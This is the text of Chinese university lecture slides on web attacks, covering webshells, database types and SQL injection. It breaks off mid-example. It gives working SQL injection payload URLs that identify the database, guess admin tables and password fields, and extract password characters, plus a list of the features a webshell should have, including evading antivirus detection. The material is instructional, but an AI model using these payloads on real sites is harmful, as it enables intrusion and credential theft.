黑客攻防技术与实践 教学课件 作者 李建华 第七章 web 攻击.pptVIP

WEBshell webshell常常被称为匿名用户（入侵者）通过网站端口对网站服务器的某种程度上操作的权限，是一个asp或php木马后门。 在选择webshell应考虑到 Wenshell应具备的功能，如查询主机所开放的服务、查询是否禁止CMD/FSO插件等 webshell自身操作的简便性、源代码的隐蔽性以及躲避查杀的能力 小结 Internet 上托管了越来越多的应用程序。从数据库到服务等所有内容都迁移到了基于 Web 的格式。自然，这会增加 Internet 上应用程序和服务的数量，从而出现更多针对这些目标的攻击。 因此，了解一些常见攻击的工作原理有助于为您的组织提供保护。 第7章 7. 1 SQL注入攻击 7.2 跨站脚本攻击 7.3 旁注攻击 7.4 小结 7.1 SQL注入攻击 SQL注入攻击，是依靠存在弱点的Web脚本代码，来实现通过浏览器执行任意SQL语句，从而实现最终获取某种权限的攻击技术。 SQL注入的原理，就是从客户端提交特殊的代码，搜集程序及服务器的信息，从而获得想得到的资料 Access数据库 access一般是中小型企业使用的后台数据库，他是专门用来存储数据用的，例如：一些会员的注册信息，商品的发布信息，新闻的发布信息，客户的留言等等，他和网页之间的连接是靠专门的读取和存储数据的数据库语言来实现的。 ACCESS 缺点： 安全性不够，加了用户级密码容易破解,如果做为服务器的话，对服务器要求很高，否则容易造成 MDB 损坏. 并发数255，但是对高强度操作适应性差，如果服务器不够好，网络不够好，编程的方法不够好，多人同时访问就能导致 MDB 损坏. 每个数据库文件最大限制只有2G，对于大型网站显然不能够胜任。 MSSQL数据库 MS SQL是指微软的SQL Server的数据库平台，提供从服务器到终端的完整的解决方案，其中数据库服务器部分，是一个数据库管理系统，用于建立、使用和维护数据库，一般和ASP/ASP.net结合。 他在数据库查询(尤其是百万级数据)方面性能远远超过ACCESS。 ACCESS一旦同时打开的用户过多，或查询的数据量过大，极其容易导致整台服务器使用ACCESS的网站瘫痪，MSSQL很好的解决了这个问题。 MSSQL数据库 MSSQL三个关键系统表 sysdatabases系统表 Sysobjects系统表 syscolumns系统表 MySQL数据库 MySQL是一个小型关系型数据库管理系统，开发者为瑞典MySQL AB公司。在2008年1月16号被Sun公司收购。 由于其体积小、速度快、总体拥有成本低，开放源码， MySQL被广泛地应用在Internet上的中小型网站中。 数据库类型判断 利用数据库服务器的系统变量进行区分 HTTP:///news.asp?id=xx;and user＞0 HTTP:///news.asp?id=xx ;and (select count(*) from sysobjects)＞0 HTTP:///news.asp?id=xx ;and (select count(*) from msysobjects)＞0  数据库类型判断 利用系统表 HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from sysobjects)0 HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from msysobjects)0 数据库类型判断 猜表名 http://地址/index.asp?Sort_ID=3 and (select count(*) from [admin])0 猜字段 http://地址/index.asp?Sort_ID=3 and (select count(pwd) from [admin])0 http://地址/index.asp?Sort_ID=3 and (select count(admin) from [admin])0 猜解数据 http://地址/index.asp?Sort_ID=3 and (select asc(mid(pwd,1,1)) from [admin])50 ACCESS注入的判断 简单判断 在某一网页中点击链接：/showdetail.ASP?id=49，在这个地址后面加上单引号’, 服务器会返回下面的错误提示： 　Microsoft JET Database Engine 错误 80040e14 　字符串的语法错误 在查询表达式 ID=49 中。 　 　/showdetail.ASP，行8　　 ACCESS注入的判断 整型参数准确判断 1）HTTP://xxx.x